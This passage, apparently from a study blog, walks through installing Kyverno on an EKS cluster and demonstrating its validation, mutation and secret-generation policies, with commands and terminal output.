aws ec2 describe-vpcs --region ap-northeast-2 --output table --no-cli-pager
exit
--------------------------------

# Return resource usage metrics (such as container CPU, memory usage, etc.)
kubeletctl -s $N1 metrics

Kyverno

Kyverno is a policy engine designed for Kubernetes that allows you to enforce and manage policies across your cluster. It provides a powerful and flexible way to define and apply policies using a Kubernetes-native approach. Kyverno supports both mutating and validating admission controllers, enabling you to modify and validate resources before they are created or updated in the cluster.

To get started with Kyverno, you need to install it in your Kubernetes cluster. The installation process may vary depending on your Kubernetes distribution, but typically involves applying Kyverno’s YAML manifests or using a package manager like Helm.

Once installed, you can define Kyverno policies using the ClusterPolicy or Policy resources. These policies are written in YAML and specify the rules, conditions, and actions to be taken. Kyverno automatically detects and enforces these policies across your cluster.

# Installation
# Notes for installing on EKS: https://kyverno.io/docs/installation/platform-notes/#notes-for-eks-users
# Monitoring reference: https://kyverno.io/docs/monitoring/
cat << EOF > kyverno-value.yaml
config:
  resourceFiltersExcludeNamespaces: [ kube-system ]

admissionController:
  serviceMonitor:
    enabled: true

backgroundController:
  serviceMonitor:
    enabled: true

cleanupController:
  serviceMonitor:
    enabled: true

reportsController:
  serviceMonitor:
    enabled: true
EOF
kubectl create ns kyverno
helm repo add kyverno https://kyverno.github.io/kyverno/
helm install kyverno kyverno/kyverno --version 3.2.0-rc.3 -f kyverno-value.yaml -n kyverno

# Verify
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get all -n kyverno

NAME READY STATUS RESTARTS AGE
pod/kyverno-admission-controller-69665dff5-pvltv 1/1 Running 0 31s
pod/kyverno-background-controller-56bc88f4dc-m4kp5 1/1 Running 0 31s
pod/kyverno-cleanup-controller-64448c5b4d-fxzks 1/1 Running 0 31s
pod/kyverno-reports-controller-6bbd8f8d4-zjctd 1/1 Running 0 31s

NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
service/kyverno-background-controller-metrics ClusterIP 10.100.145.15 <none> 8000/TCP 31s
service/kyverno-cleanup-controller ClusterIP 10.100.241.190 <none> 443/TCP 31s
service/kyverno-cleanup-controller-metrics ClusterIP 10.100.93.149 <none> 8000/TCP 31s
service/kyverno-reports-controller-metrics ClusterIP 10.100.79.141 <none> 8000/TCP 31s
service/kyverno-svc ClusterIP 10.100.233.172 <none> 443/TCP 31s
service/kyverno-svc-metrics ClusterIP 10.100.232.125 <none> 8000/TCP 31s

NAME READY UP-TO-DATE AVAILABLE AGE
deployment.apps/kyverno-admission-controller 1/1 1 1 31s
deployment.apps/kyverno-background-controller 1/1 1 1 31s
deployment.apps/kyverno-cleanup-controller 1/1 1 1 31s
deployment.apps/kyverno-reports-controller 1/1 1 1 31s

NAME DESIRED CURRENT READY AGE
replicaset.apps/kyverno-admission-controller-69665dff5 1 1 1 31s
replicaset.apps/kyverno-background-controller-56bc88f4dc 1 1 1 31s
replicaset.apps/kyverno-cleanup-controller-64448c5b4d 1 1 1 31s
replicaset.apps/kyverno-reports-controller-6bbd8f8d4 1 1 1 31s

NAME SCHEDULE SUSPEND ACTIVE LAST SCHEDULE AGE
cronjob.batch/kyverno-cleanup-admission-reports */10 * * * * False 0 <none> 31s
cronjob.batch/kyverno-cleanup-cluster-admission-reports */10 * * * * False 0 <none> 31s
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get crd | grep kyverno
admissionreports.kyverno.io 2024-04-13T13:06:08Z
backgroundscanreports.kyverno.io 2024-04-13T13:06:08Z
cleanuppolicies.kyverno.io 2024-04-13T13:06:08Z
clusteradmissionreports.kyverno.io 2024-04-13T13:06:08Z
clusterbackgroundscanreports.kyverno.io 2024-04-13T13:06:08Z
clustercleanuppolicies.kyverno.io 2024-04-13T13:06:08Z
clusterephemeralreports.reports.kyverno.io 2024-04-13T13:06:08Z
clusterpolicies.kyverno.io 2024-04-13T13:06:09Z
ephemeralreports.reports.kyverno.io 2024-04-13T13:06:08Z
globalcontextentries.kyverno.io 2024-04-13T13:06:08Z
policies.kyverno.io 2024-04-13T13:06:09Z
policyexceptions.kyverno.io 2024-04-13T13:06:08Z
updaterequests.kyverno.io 2024-04-13T13:06:08Z
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod,svc -n kyverno
NAME READY STATUS RESTARTS AGE
pod/kyverno-admission-controller-69665dff5-pvltv 1/1 Running 0 33s
pod/kyverno-background-controller-56bc88f4dc-m4kp5 1/1 Running 0 33s
pod/kyverno-cleanup-controller-64448c5b4d-fxzks 1/1 Running 0 33s
pod/kyverno-reports-controller-6bbd8f8d4-zjctd 1/1 Running 0 33s

NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
service/kyverno-background-controller-metrics ClusterIP 10.100.145.15 <none> 8000/TCP 33s
service/kyverno-cleanup-controller ClusterIP 10.100.241.190 <none> 443/TCP 33s
service/kyverno-cleanup-controller-metrics ClusterIP 10.100.93.149 <none> 8000/TCP 33s
service/kyverno-reports-controller-metrics ClusterIP 10.100.79.141 <none> 8000/TCP 33s
service/kyverno-svc ClusterIP 10.100.233.172 <none> 443/TCP 33s
service/kyverno-svc-metrics ClusterIP 10.100.232.125 <none> 8000/TCP 33s

# (Reference) Default certificates: https://kyverno.io/docs/installation/customization/#default-certificates
# Install step-cli: https://smallstep.com/docs/step-cli/installation/
wget https://dl.smallstep.com/cli/docs-cli-install/latest/step-cli_amd64.rpm
sudo rpm -i step-cli_amd64.rpm

#
kubectl -n kyverno get secret
kubectl -n kyverno get secret kyverno-svc.kyverno.svc.kyverno-tls-ca -o jsonpath='{.data.tls\.crt}' | base64 -d
kubectl -n kyverno get secret kyverno-svc.kyverno.svc.kyverno-tls-ca -o jsonpath='{.data.tls\.crt}' | base64 -d | step certificate inspect --short
X.509v3 Root CA Certificate (RSA 2048) [Serial: 0]
Subject: *.kyverno.svc
Issuer: *.kyverno.svc
Valid from: 2024-04-07T06:05:52Z
to: 2025-04-07T07:05:52Z

#
kubectl get validatingwebhookconfiguration kyverno-policy-validating-webhook-cfg -o jsonpath='{.webhooks[0].clientConfig.caBundle}' | base64 -d | step certificate inspect --short
X.509v3 Root CA Certificate (RSA 2048) [Serial: 0]
Subject: *.kyverno.svc
Issuer: *.kyverno.svc
Valid from: 2024-04-07T06:05:52Z
to: 2025-04-07T07:05:52Z

validation

  • A Kyverno ClusterPolicy named “require-labels” is created to enforce a validation rule on all pods in the cluster. The purpose of this policy is to ensure that every pod has a label with the key “team”.
# validation
# Monitoring
watch -d kubectl get pod -n kyverno

# Apply the ClusterPolicy
kubectl create -f- << EOF
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-labels
spec:
  validationFailureAction: Enforce
  rules:
  - name: check-team
    match:
      any:
      - resources:
          kinds:
          - Pod
    validate:
      message: "label 'team' is required"
      pattern:
        metadata:
          labels:
            team: "?*"
EOF

# Verify
kubectl get validatingwebhookconfigurations
kubectl get ClusterPolicy
NAME ADMISSION BACKGROUND VALIDATE ACTION READY AGE MESSAGE
require-labels true true Enforce True 12s Ready

# Try creating a deployment (without the required label)
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl create deployment nginx --image=nginx
error: failed to create deployment: admission webhook "validate.kyverno.svc-fail" denied the request:

resource Deployment/default/nginx was blocked due to the following policies

require-labels:
autogen-check-team: 'validation error: label ''team'' is required. rule autogen-check-team
failed at path /spec/template/metadata/labels/team/'

# Create a pod with the required label
kubectl run nginx --image nginx --labels team=backend
kubectl get pod -l team=backend

# Verify
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get policyreport -o wide | grep nginx
3ab33987-2065-4e3a-a8e4-dbd4976554f9 Pod nginx 1 0 0 0 0 2s
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get policyreport 3ab33987-2065-4e3a-a8e4-dbd4976554f9 -o yaml | kubectl neat | yh
apiVersion: wgpolicyk8s.io/v1alpha2
kind: PolicyReport
metadata:
  labels:
    app.kubernetes.io/managed-by: kyverno
  name: 3ab33987-2065-4e3a-a8e4-dbd4976554f9
  namespace: default
results:
- message: validation rule 'check-team' passed.
  policy: require-labels
  result: pass
  rule: check-team
  scored: true
  source: kyverno
  timestamp:
    nanos: 0
    seconds: 1713014288
scope:
  apiVersion: v1
  kind: Pod
  name: nginx
  namespace: default
  uid: 3ab33987-2065-4e3a-a8e4-dbd4976554f9
summary:
  error: 0
  fail: 0
  pass: 1
  skip: 0
  warn: 0

# Delete the policy
kubectl delete clusterpolicy require-labels

mutation

  • A Kyverno ClusterPolicy named “add-labels” is created to automatically add the label team=bravo to any pod that is missing the “team” label.
kubectl create -f- << EOF
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: add-labels
spec:
  rules:
  - name: add-team
    match:
      any:
      - resources:
          kinds:
          - Pod
    mutate:
      patchStrategicMerge:
        metadata:
          labels:
            +(team): bravo
EOF

# Verify
kubectl get mutatingwebhookconfigurations
kubectl get ClusterPolicy
NAME ADMISSION BACKGROUND VALIDATE ACTION READY AGE MESSAGE
add-labels true true Audit True 6m41s Ready

# Create a pod and check its labels
kubectl run redis --image redis
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod redis --show-labels
NAME READY STATUS RESTARTS AGE LABELS
redis 0/1 ContainerCreating 0 4s run=redis,team=bravo

# Create a pod and check its labels: how does this differ from the one above? (the +(team) anchor only adds the label when it is missing, so the explicit team=alpha is preserved)
kubectl run newredis --image redis -l team=alpha
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod newredis --show-labels
NAME READY STATUS RESTARTS AGE LABELS
newredis 0/1 ContainerCreating 0 1s team=alpha

# Delete the policy
kubectl delete clusterpolicy add-labels

generation

  • A Kyverno ClusterPolicy named “sync-secrets” is created to automatically generate an image pull secret in new namespaces based on an existing secret in the “default” namespace.
  • This generation example demonstrates how Kyverno can be used to automatically create resources based on predefined rules and existing resources.
  • In this case, it ensures that every new namespace has an image pull secret available, cloned from a central secret in the “default” namespace.
  1. The generate section of the rule defines the resource to be generated when a new namespace is created.
  2. The apiVersion and kind fields specify that the generated resource will be a Secret.
  3. The name field sets the name of the generated secret to "regcred".
  4. The namespace field uses a variable substitution "{{request.object.metadata.name}}" to dynamically set the namespace of the generated secret to the name of the newly created namespace.
  5. The synchronize field is set to "true", which means that if the source secret ("regcred" in the "default" namespace) is updated, the generated secrets in other namespaces will be automatically synchronized with the updated content.
  6. The clone field specifies the source secret to be cloned. In this case, it refers to the "regcred" secret in the "default" namespace.
  7. When a new namespace is created, Kyverno will automatically generate a Secret named “regcred” in that namespace, cloning the content of the “regcred” secret from the “default” namespace.
  8. You can verify the generation by creating a new namespace using kubectl create ns mytestns and then checking the secrets in that namespace using kubectl -n mytestns get secret. The "regcred" secret should be present in the newly created namespace.
# First, create this Kubernetes Secret in your cluster which will simulate a real image pull secret.
kubectl -n default create secret docker-registry regcred \
--docker-server=myinternalreg.corp.com \
--docker-username=john.doe \
--docker-password=Passw0rd123! \
--docker-email=john.doe@corp.com

#
kubectl get secret regcred
NAME TYPE DATA AGE
regcred kubernetes.io/dockerconfigjson 1 26s

#
kubectl create -f- << EOF
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: sync-secrets
spec:
  rules:
  - name: sync-image-pull-secret
    match:
      any:
      - resources:
          kinds:
          - Namespace
    generate:
      apiVersion: v1
      kind: Secret
      name: regcred
      namespace: "{{request.object.metadata.name}}"
      synchronize: true
      clone:
        namespace: default
        name: regcred
EOF

#
kubectl get ClusterPolicy
NAME ADMISSION BACKGROUND VALIDATE ACTION READY AGE MESSAGE
sync-secrets true true Audit True 8s Ready

# Create a new namespace and verify the cloned secret
kubectl create ns mytestns
kubectl -n mytestns get secret
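
# The cloned secret should match the source in the default namespace (sanity check; assumes both exist)
diff <(kubectl -n default get secret regcred -o jsonpath='{.data.\.dockerconfigjson}') \
     <(kubectl -n mytestns get secret regcred -o jsonpath='{.data.\.dockerconfigjson}') \
  && echo "regcred is in sync"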

# Delete the policy
kubectl delete clusterpolicy sync-secrets
